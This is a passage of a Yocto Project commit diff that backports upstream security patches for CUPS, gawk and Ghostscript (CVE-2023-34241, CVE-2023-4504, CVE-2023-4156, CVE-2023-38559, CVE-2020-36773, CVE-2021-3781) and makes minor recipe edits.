15 | --- a/conf/cupsd.conf.in | ||
16 | +++ b/conf/cupsd.conf.in | ||
17 | @@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@ | ||
18 | Order deny,allow | ||
19 | </Limit> | ||
20 | |||
21 | - <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document> | ||
22 | + <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job> | ||
23 | + Require user @OWNER @SYSTEM | ||
24 | + Order deny,allow | ||
25 | + </Limit> | ||
26 | + | ||
27 | + <Limit CUPS-Get-Document> | ||
28 | + AuthType Default | ||
29 | Require user @OWNER @SYSTEM | ||
30 | Order deny,allow | ||
31 | </Limit> | ||
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch new file mode 100644 index 0000000000..816efc2946 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch | |||
@@ -0,0 +1,65 @@ | |||
1 | From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001 | ||
2 | From: Rose <83477269+AtariDreams@users.noreply.github.com> | ||
3 | Date: Thu, 1 Jun 2023 11:33:39 -0400 | ||
4 | Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection | ||
5 | |||
6 | httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to. | ||
7 | |||
8 | We have to log the hostname first. | ||
9 | |||
10 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2] | ||
11 | CVE: CVE-2023-34241 | ||
12 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
13 | --- | ||
14 | scheduler/client.c | 16 +++++++--------- | ||
15 | 1 file changed, 7 insertions(+), 9 deletions(-) | ||
16 | |||
17 | diff --git a/scheduler/client.c b/scheduler/client.c | ||
18 | index 91e441188c..327473a4d1 100644 | ||
19 | --- a/scheduler/client.c | ||
20 | +++ b/scheduler/client.c | ||
21 | @@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
22 | /* | ||
23 | * Can't have an unresolved IP address with double-lookups enabled... | ||
24 | */ | ||
25 | - | ||
26 | - httpClose(con->http); | ||
27 | - | ||
28 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
29 | - "Name lookup failed - connection from %s closed!", | ||
30 | + "Name lookup failed - closing connection from %s!", | ||
31 | httpGetHostname(con->http, NULL, 0)); | ||
32 | |||
33 | + httpClose(con->http); | ||
34 | free(con); | ||
35 | return; | ||
36 | } | ||
37 | @@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
38 | * with double-lookups enabled... | ||
39 | */ | ||
40 | |||
41 | - httpClose(con->http); | ||
42 | - | ||
43 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
44 | - "IP lookup failed - connection from %s closed!", | ||
45 | + "IP lookup failed - closing connection from %s!", | ||
46 | httpGetHostname(con->http, NULL, 0)); | ||
47 | + | ||
48 | + httpClose(con->http); | ||
49 | free(con); | ||
50 | return; | ||
51 | } | ||
52 | @@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
53 | |||
54 | if (!hosts_access(&wrap_req)) | ||
55 | { | ||
56 | - httpClose(con->http); | ||
57 | - | ||
58 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
59 | "Connection from %s refused by /etc/hosts.allow and " | ||
60 | "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0)); | ||
61 | + | ||
62 | + httpClose(con->http); | ||
63 | free(con); | ||
64 | return; | ||
65 | } | ||
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch new file mode 100644 index 0000000000..be0db1fbd4 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch | |||
@@ -0,0 +1,40 @@ | |||
1 | From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Fri, 1 Sep 2023 16:47:29 +0200 | ||
4 | Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504 | ||
5 | |||
6 | We didn't check for end of buffer if it looks there is an escaped | ||
7 | character - check for NULL terminator there and if found, return NULL | ||
8 | as return value and in `ptr`, because a lone backslash is not | ||
9 | a valid PostScript character. | ||
10 | |||
11 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31] | ||
12 | CVE: CVE-2023-4504 | ||
13 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
14 | --- | ||
15 | cups/raster-interpret.c | 14 +++++++++++++- | ||
16 | 1 file changed, 13 insertions(+), 1 deletion(-) | ||
17 | |||
18 | --- a/cups/raster-interpret.c | ||
19 | +++ b/cups/raster-interpret.c | ||
20 | @@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S | ||
21 | |||
22 | cur ++; | ||
23 | |||
24 | - if (*cur == 'b') | ||
25 | + /* | ||
26 | + * Return NULL if we reached NULL terminator, a lone backslash | ||
27 | + * is not a valid character in PostScript. | ||
28 | + */ | ||
29 | + | ||
30 | + if (!*cur) | ||
31 | + { | ||
32 | + *ptr = NULL; | ||
33 | + | ||
34 | + return (NULL); | ||
35 | + } | ||
36 | + | ||
37 | + if (*cur == 'b') | ||
38 | *valptr++ = '\b'; | ||
39 | else if (*cur == 'f') | ||
40 | *valptr++ = '\f'; | ||
diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb index 02b016fdf1..e726899c52 100644 --- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb +++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Collection of autoconf m4 macros" | 1 | SUMMARY = "Collection of autoconf m4 macros" |
2 | SECTION = "base" | 2 | SECTION = "base" |
3 | HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/" | 3 | HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/" |
4 | DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them." | ||
4 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
5 | LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a" | 6 | LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a" |
6 | 7 | ||
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb index 886c3ddcab..60e6a3d34e 100644 --- a/meta/recipes-extended/ed/ed_1.15.bb +++ b/meta/recipes-extended/ed/ed_1.15.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Line-oriented text editor" | 1 | SUMMARY = "Line-oriented text editor" |
2 | HOMEPAGE = "http://www.gnu.org/software/ed/" | 2 | HOMEPAGE = "http://www.gnu.org/software/ed/" |
3 | DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands." | ||
3 | 4 | ||
4 | LICENSE = "GPLv3+" | 5 | LICENSE = "GPLv3+" |
5 | LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \ | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \ |
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch new file mode 100644 index 0000000000..c6cba058a7 --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch | |||
@@ -0,0 +1,28 @@ | |||
1 | From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001 | ||
2 | From: "Arnold D. Robbins" <arnold@skeeve.com> | ||
3 | Date: Wed, 3 Aug 2022 13:00:54 +0300 | ||
4 | Subject: [PATCH] Smal bug fix in builtin.c. | ||
5 | |||
6 | Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security | ||
7 | Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212] | ||
8 | CVE: CVE-2023-4156 | ||
9 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
10 | --- | ||
11 | ChangeLog | 6 ++++++ | ||
12 | builtin.c | 5 ++++- | ||
13 | 2 files changed, 10 insertions(+), 1 deletion(-) | ||
14 | |||
15 | --- gawk-5.1.0.orig/builtin.c | ||
16 | +++ gawk-5.1.0/builtin.c | ||
17 | @@ -957,7 +957,10 @@ check_pos: | ||
18 | s1++; | ||
19 | n0--; | ||
20 | } | ||
21 | - if (val >= num_args) { | ||
22 | + // val could be less than zero if someone provides a field width | ||
23 | + // so large that it causes integer overflow. Mainly fuzzers do this, | ||
24 | + // but let's try to be good anyway. | ||
25 | + if (val < 0 || val >= num_args) { | ||
26 | toofew = true; | ||
27 | break; | ||
28 | } | ||
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch new file mode 100644 index 0000000000..167c0787ee --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch | |||
@@ -0,0 +1,24 @@ | |||
1 | These tests require an unloaded host as otherwise timing sensitive tests can fail | ||
2 | https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371 | ||
3 | |||
4 | Upstream-Status: Inappropriate | ||
5 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
6 | |||
7 | --- a/test/Maketests~ | ||
8 | +++ b/test/Maketests | ||
9 | @@ -2069,7 +2069,2 @@ | ||
10 | |||
11 | -timeout: | ||
12 | - @echo $@ $(ZOS_FAIL) | ||
13 | - @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ | ||
14 | - @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
15 | - | ||
16 | typedregex1: | ||
17 | @@ -2297,7 +2292,2 @@ | ||
18 | @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
19 | - | ||
20 | -time: | ||
21 | - @echo $@ | ||
22 | - @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ | ||
23 | - @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ | ||
24 | |||
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb index e79ccfdebf..c71890c19e 100644 --- a/meta/recipes-extended/gawk/gawk_5.0.1.bb +++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb | |||
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline" | |||
16 | PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr" | 16 | PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr" |
17 | 17 | ||
18 | SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \ | 18 | SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \ |
19 | file://remove-sensitive-tests.patch \ | ||
19 | file://run-ptest \ | 20 | file://run-ptest \ |
21 | file://CVE-2023-4156.patch \ | ||
20 | " | 22 | " |
21 | 23 | ||
22 | SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb" | 24 | SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb" |
@@ -41,13 +43,20 @@ inherit ptest | |||
41 | do_install_ptest() { | 43 | do_install_ptest() { |
42 | mkdir ${D}${PTEST_PATH}/test | 44 | mkdir ${D}${PTEST_PATH}/test |
43 | ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk | 45 | ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk |
44 | for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \ | 46 | # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy |
45 | do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \ | 47 | TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests) |
48 | for i in $TESTS Maketests inclib.awk; do | ||
49 | cp ${S}/test/$i* ${D}${PTEST_PATH}/test | ||
46 | done | 50 | done |
47 | sed -i -e 's|/usr/local/bin|${bindir}|g' \ | 51 | sed -i -e 's|/usr/local/bin|${bindir}|g' \ |
48 | -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk | 52 | -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk |
49 | 53 | ||
50 | sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests | 54 | sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests |
55 | |||
56 | # These tests require an unloaded host as otherwise timing sensitive tests can fail | ||
57 | # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371 | ||
58 | rm -f ${D}${PTEST_PATH}/test/time.* | ||
59 | rm -f ${D}${PTEST_PATH}/test/timeout.* | ||
51 | } | 60 | } |
52 | 61 | ||
53 | RDEPENDS_${PN}-ptest += "make" | 62 | RDEPENDS_${PN}-ptest += "make" |
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch new file mode 100644 index 0000000000..91b9f6df50 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch | |||
@@ -0,0 +1,31 @@ | |||
1 | From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Mon, 17 Jul 2023 14:06:37 +0100 | ||
4 | Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from | ||
5 | devices/gdevpcx.c | ||
6 | |||
7 | Bounds check the buffer, before dereferencing the pointer. | ||
8 | |||
9 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f] | ||
10 | CVE: CVE-2023-38559 | ||
11 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
12 | --- | ||
13 | base/gdevdevn.c | 2 +- | ||
14 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
15 | |||
16 | diff --git a/base/gdevdevn.c b/base/gdevdevn.c | ||
17 | index 3b019d6..2888776 100644 | ||
18 | --- a/base/gdevdevn.c | ||
19 | +++ b/base/gdevdevn.c | ||
20 | @@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file | ||
21 | byte data = *from; | ||
22 | |||
23 | from += step; | ||
24 | - if (data != *from || from == end) { | ||
25 | + if (from >= end || data != *from) { | ||
26 | if (data >= 0xc0) | ||
27 | gp_fputc(0xc1, file); | ||
28 | } else { | ||
29 | -- | ||
30 | 2.25.1 | ||
31 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch new file mode 100644 index 0000000000..ea8bf26f3f --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch | |||
@@ -0,0 +1,109 @@ | |||
1 | From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001 | ||
2 | From: Ken Sharp <ken.sharp@artifex.com> | ||
3 | Date: Wed, 20 May 2020 16:02:07 +0100 | ||
4 | Subject: [PATCH] txtwrite - address memory problems | ||
5 | |||
6 | Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)" | ||
7 | Also bug #702346 and the earlier report #701877. | ||
8 | |||
9 | The problems occur because its possible for a single character code in | ||
10 | a PDF file to map to more than a single Unicode code point. In the case | ||
11 | of the file for 701877 the character code maps to 'f' and 'i' (it is an | ||
12 | fi ligature). | ||
13 | |||
14 | The code should deal with this, but we need to ensure we are using the | ||
15 | correct index. In addition, if we do get more Unicode code points than | ||
16 | we expected, we need to set the widths of the 'extra' code points to | ||
17 | zero (we only want to consider the width of the original character). | ||
18 | |||
19 | This does mean increasing the size of the Widths array to cater for | ||
20 | the possibility of more entries on output than there were on input. | ||
21 | |||
22 | While working on it I noticed that the Unicode remapping on little- | ||
23 | endian machines was reversing the order of the Unicode values, when | ||
24 | there was more than a single code point returned, so fixed that at | ||
25 | the same time. | ||
26 | |||
27 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874] | ||
28 | CVE: CVE-2020-36773 | ||
29 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
30 | --- | ||
31 | devices/vector/gdevtxtw.c | 26 ++++++++++++++++---------- | ||
32 | 1 file changed, 16 insertions(+), 10 deletions(-) | ||
33 | |||
34 | diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c | ||
35 | index 87f9355..bddce5a 100644 | ||
36 | --- a/devices/vector/gdevtxtw.c | ||
37 | +++ b/devices/vector/gdevtxtw.c | ||
38 | @@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph, | ||
39 | #else | ||
40 | b = (char *)Buffer; | ||
41 | u = (char *)unicode; | ||
42 | - while (l >= 0) { | ||
43 | - *b++ = *(u + l); | ||
44 | - l--; | ||
45 | - } | ||
46 | |||
47 | + for (l=0;l<length;l+=2, u+=2){ | ||
48 | + *b++ = *(u+1); | ||
49 | + *b++ = *u; | ||
50 | + } | ||
51 | #endif | ||
52 | gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer"); | ||
53 | return length / sizeof(short); | ||
54 | @@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) | ||
55 | &penum->text_state->matrix, &wanted); | ||
56 | pte->returned.total_width.x += wanted.x; | ||
57 | pte->returned.total_width.y += wanted.y; | ||
58 | - penum->Widths[pte->index - 1] = wanted.x; | ||
59 | + penum->Widths[penum->TextBufferIndex] = wanted.x; | ||
60 | |||
61 | if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) { | ||
62 | gs_point tpt; | ||
63 | @@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) | ||
64 | pte->returned.total_width.x += dpt.x; | ||
65 | pte->returned.total_width.y += dpt.y; | ||
66 | |||
67 | - penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); | ||
68 | - penum->Widths[pte->index - 1] += dpt.x; | ||
69 | + penum->Widths[penum->TextBufferIndex] += dpt.x; | ||
70 | + code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); | ||
71 | + /* If a single text code returned multiple Unicode values, then we need to set the | ||
72 | + * 'extra' code points' widths to 0. | ||
73 | + */ | ||
74 | + if (code > 1) | ||
75 | + memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float)); | ||
76 | + penum->TextBufferIndex += code; | ||
77 | } | ||
78 | return 0; | ||
79 | } | ||
80 | @@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) | ||
81 | if (!penum->text_state->Widths) | ||
82 | return gs_note_error(gs_error_VMerror); | ||
83 | memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); | ||
84 | - memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float)); | ||
85 | + memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); | ||
86 | |||
87 | unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory, | ||
88 | penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer"); | ||
89 | @@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) | ||
90 | if (!unsorted_entry->Widths) | ||
91 | return gs_note_error(gs_error_VMerror); | ||
92 | memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); | ||
93 | - memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float)); | ||
94 | + memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); | ||
95 | |||
96 | unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory, | ||
97 | (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer"); | ||
98 | @@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte) | ||
99 | if (!penum->TextBuffer) | ||
100 | return gs_note_error(gs_error_VMerror); | ||
101 | penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory, | ||
102 | - pte->text.size, sizeof(float), "txtwrite temporary widths array"); | ||
103 | + pte->text.size * 4, sizeof(float), "txtwrite temporary widths array"); | ||
104 | if (!penum->Widths) | ||
105 | return gs_note_error(gs_error_VMerror); | ||
106 | } | ||
107 | -- | ||
108 | 2.25.1 | ||
109 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch new file mode 100644 index 0000000000..033ba77f9a --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch | |||
@@ -0,0 +1,121 @@ | |||
1 | From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Thu, 20 Aug 2020 17:19:09 +0100 | ||
4 | Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions | ||
5 | |||
6 | Firstly, in gx_device_delete_output_file the iodev pointer was being passed | ||
7 | to the delete_method incorrectly (passing a pointer to that pointer). Thus | ||
8 | when we attempted to use that to confirm permission to delete the file, it | ||
9 | crashed. Credit to Ken for finding that. | ||
10 | |||
11 | Secondly, due to the way pdfwrite works, when running with an output file per | ||
12 | page, it creates the current output file immediately it has completed writing | ||
13 | the previous one. Thus, it has to delete that partial file on exit. | ||
14 | |||
15 | Previously, the output file was not added to the "control" permission list, | ||
16 | so an attempt to delete it would result in an error. So add the output file | ||
17 | to the "control" as well as "write" list. | ||
18 | |||
19 | CVE: CVE-2021-3781 | ||
20 | |||
21 | Upstream-Status: Backport: | ||
22 | https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f | ||
23 | |||
24 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
25 | --- | ||
26 | base/gsdevice.c | 2 +- | ||
27 | base/gslibctx.c | 20 ++++++++++++++------ | ||
28 | 2 files changed, 15 insertions(+), 7 deletions(-) | ||
29 | |||
30 | diff --git a/base/gsdevice.c b/base/gsdevice.c | ||
31 | index 913119495..ac78af93f 100644 | ||
32 | --- a/base/gsdevice.c | ||
33 | +++ b/base/gsdevice.c | ||
34 | @@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname) | ||
35 | parsed.len = strlen(parsed.fname); | ||
36 | } | ||
37 | if (parsed.iodev) | ||
38 | - code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname); | ||
39 | + code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname); | ||
40 | else | ||
41 | code = gs_note_error(gs_error_invalidfileaccess); | ||
42 | |||
43 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
44 | index d726c58b5..ff8fc895e 100644 | ||
45 | --- a/base/gslibctx.c | ||
46 | +++ b/base/gslibctx.c | ||
47 | @@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
48 | char *fp, f[gp_file_name_sizeof]; | ||
49 | const int pipe = 124; /* ASCII code for '|' */ | ||
50 | const int len = strlen(fname); | ||
51 | - int i; | ||
52 | + int i, code; | ||
53 | |||
54 | /* Be sure the string copy will fit */ | ||
55 | if (len >= gp_file_name_sizeof) | ||
56 | @@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
57 | rewrite_percent_specifiers(f); | ||
58 | for (i = 0; i < len; i++) { | ||
59 | if (f[i] == pipe) { | ||
60 | - int code; | ||
61 | - | ||
62 | fp = &f[i + 1]; | ||
63 | /* Because we potentially have to check file permissions at two levels | ||
64 | for the output file (gx_device_open_output_file and the low level | ||
65 | @@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
66 | if (code < 0) | ||
67 | return code; | ||
68 | break; | ||
69 | + code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
70 | + if (code < 0) | ||
71 | + return code; | ||
72 | } | ||
73 | if (!IS_WHITESPACE(f[i])) | ||
74 | break; | ||
75 | } | ||
76 | + code = gs_add_control_path(mem, gs_permit_file_control, fp); | ||
77 | + if (code < 0) | ||
78 | + return code; | ||
79 | return gs_add_control_path(mem, gs_permit_file_writing, fp); | ||
80 | } | ||
81 | |||
82 | @@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
83 | char *fp, f[gp_file_name_sizeof]; | ||
84 | const int pipe = 124; /* ASCII code for '|' */ | ||
85 | const int len = strlen(fname); | ||
86 | - int i; | ||
87 | + int i, code; | ||
88 | |||
89 | /* Be sure the string copy will fit */ | ||
90 | if (len >= gp_file_name_sizeof) | ||
91 | @@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
92 | /* Try to rewrite any %d (or similar) in the string */ | ||
93 | for (i = 0; i < len; i++) { | ||
94 | if (f[i] == pipe) { | ||
95 | - int code; | ||
96 | - | ||
97 | fp = &f[i + 1]; | ||
98 | /* Because we potentially have to check file permissions at two levels | ||
99 | for the output file (gx_device_open_output_file and the low level | ||
100 | @@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
101 | the pipe_fopen(), the leading '|' has been stripped. | ||
102 | */ | ||
103 | code = gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
104 | + if (code < 0) | ||
105 | + return code; | ||
106 | + code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
107 | if (code < 0) | ||
108 | return code; | ||
109 | break; | ||
110 | @@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
111 | if (!IS_WHITESPACE(f[i])) | ||
112 | break; | ||
113 | } | ||
114 | + code = gs_remove_control_path(mem, gs_permit_file_control, fp); | ||
115 | + if (code < 0) | ||
116 | + return code; | ||
117 | return gs_remove_control_path(mem, gs_permit_file_writing, fp); | ||
118 | } | ||
119 | |||
120 | -- | ||
121 | 2.25.1 | ||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch new file mode 100644 index 0000000000..beade79eef --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch | |||
@@ -0,0 +1,37 @@ | |||
1 | From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Mon, 24 Aug 2020 09:24:31 +0100 | ||
4 | Subject: [PATCH] Coverity 361429: move "break" to correct place. | ||
5 | |||
6 | We had to add the outputfile to the "control" file permission list (as well | ||
7 | as write), but for the "pipe" case, I accidentally added the call after the | ||
8 | break out of loop that checks for a pipe. | ||
9 | |||
10 | CVE: CVE-2021-3781 | ||
11 | |||
12 | Upstream-Status: Backport: | ||
13 | https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382 | ||
14 | |||
15 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
16 | --- | ||
17 | base/gslibctx.c | 2 +- | ||
